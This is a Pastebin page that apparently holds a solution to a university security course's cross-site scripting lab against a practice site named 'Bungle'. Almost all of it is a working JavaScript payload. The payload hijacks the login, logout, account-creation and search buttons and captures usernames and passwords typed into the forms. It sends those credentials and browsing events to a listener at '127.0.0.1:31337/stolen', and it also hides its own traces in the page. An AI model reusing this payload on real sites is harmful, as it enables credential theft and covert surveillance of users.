Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function payload(attacker)
- {
- var target = "http://bungle-cs461.cs.illinois.edu/";
- function log(data)
- {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function constructEvent(type, url)
- {
- if(type == "i")
- {
- Username = $("#username").val();
- Password = $("#userpass").val();
- return {event:"login",user:Username,pass:Password};
- }
- else if(type == "o")
- {
- return {event:"logout",user:($("#logged-in-user").text())};
- }
- else if(type == "c")
- {
- Username = $("#username").val();
- Password = $("#userpass").val();
- return {event:"create_account",user:Username,pass:Password};
- }
- else
- {
- if($("#logged-in-user").text() != "")
- {
- return {event:"nav",user:String($("#logged-in-user").text()),url:url}
- }
- else
- {
- return {event:"nav",url:url};
- }
- }
- }
- function proxy(href,data)
- {
- if(data == "")
- {
- $("html").load(href, function(){
- clearHistory();
- $("html").show();
- });
- }
- else
- {
- $("html").load(href, data, function(){
- clearHistory();
- $("html").show();
- });
- }
- }
- function hijackSearchButton(event)
- {
- event.preventDefault();
- searchQuery = $("#query").val();
- searchEvent = {event: "search",q:encodeURIComponent(searchQuery)}
- log(constructEvent("","search?q="+searchQuery));
- history.pushState({type: "search",url:target+"search?q="+encodeURIComponent(searchQuery)},"",target+"search?q="+encodeURIComponent(searchQuery));
- reload("search?q="+encodeURIComponent(searchQuery), "");
- }
- function hijackLogOutButton(event)
- {
- event.preventDefault();
- log(constructEvent("o",""));
- history.pushState({type:"logout",url:target},"",target);
- reload("logout",{});
- }
- function hijackLogInButton(event)
- {
- event.preventDefault();
- Username = $("#username").val();
- Password = $("#userpass").val();
- log(constructEvent("i",""));
- history.pushState({type:"logout",url:target},"",target);
- reload("login",{username:Username,password:Password});
- }
- function hijackCreateAccountButton(event)
- {
- event.preventDefault();
- Username = $("#username").val();
- Password = $("#userpass").val();
- log(constructEvent("c",""));
- history.pushState({type:"logout",url:target},"",target);
- reload("create",{username:Username,password:Password});
- }
- function hijackSearchAgainButton(event)
- {
- event.preventDefault();
- log(constructEvent("","./"));
- history.pushState({type: "again",url:target},"",target);
- reload("./","");
- }
- function clearHistory()
- {
- $("a").filter(":contains(\"function\")").remove();
- $("a").filter(":contains(\"String\")").remove();
- }
- function reload(newLink,data)
- {
- $("html").hide();
- proxy(newLink,data);
- }
- history.replaceState({type: "home",url:target},"",target);
- reload("./","");
- log(constructEvent("","./"));
- $(document).ready(function()
- {
- $(document).on("click","#search-btn",hijackSearchButton);
- $(document).on("click","#log-out-btn",hijackLogOutButton);
- $(document).on("click","#log-in-btn",hijackLogInButton);
- $(document).on("click","#new-account-btn",hijackCreateAccountButton);
- $(document).on("click","#search-again-btn",hijackSearchAgainButton);
- });
- window.onpopstate = function(event)
- {
- if(event.state.type == "search" || event.state.type == "home" || event.state.type == "logout" || event.state.type == "again")
- {
- reload(event.state.url,"");
- }
- else if(event.state.type == "login")
- {
- reload(event.state.url,{});
- }
- };
- };payload("http://127.0.0.1:31337/stolen");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement